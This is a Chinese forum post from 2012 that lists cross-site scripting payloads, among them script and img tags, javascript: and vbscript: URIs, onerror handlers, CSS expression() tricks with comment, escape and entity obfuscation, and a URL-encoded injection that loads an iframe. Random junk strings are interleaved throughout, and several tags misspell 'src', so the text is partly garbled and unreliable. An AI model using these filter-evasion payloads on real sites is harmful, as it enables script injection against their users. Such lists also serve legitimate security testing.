<script>alert("跨站")</script> (最常用)
E6 v5 z* d$ ?) s. @# W5 S# d0 y2 O<img scr=javascript:alert("跨站")></img>
2 a! y7 K# C# H0 S4 B) u<img scr="javascript: alert(/跨站/)></img>
5 b; p$ I% i! } \1 l# o# f<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)8 a1 v6 {1 X- }( g
<img scr="#" onerror=alert(/跨站/)></img>
/ u! K' }5 L3 S<img scr="#" style="xss:expression(alert(/xss/));"></img>
- R- G5 o, [$ B8 m1 t1 @<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)! z2 [3 q! A6 D! u8 I4 z
<img src=vbscript:msgbox ("xss")></img>
" a) p W$ N; U4 a<style> input {left:expression (alert('xss'))}</style>- \* I+ H4 d5 Q& [0 g( E4 R: w+ @' l. `- s
<div style={left:expression (alert('xss'))}></div>
, z! V* p$ t) I [<div style={left:exp/* */ression (alert('xss'))}></div>5 ^6 v& ~( _6 |3 o
<div style={left:\0065\0078ression (alert('xss'))}></div>
9 a( I7 ~1 \0 K0 }% \html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div> ^6 P! W* N- i" z6 W F
unicode <div style="{left:expRessioN (alert('xss'))}">
) I9 k; I7 U3 }( {9 \4 U7 H! X) J b- u
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["2 r0 p' c6 Y! G5 z5 [) F
|
发表于 2012-9-13 17:15:04
收藏
支持
反对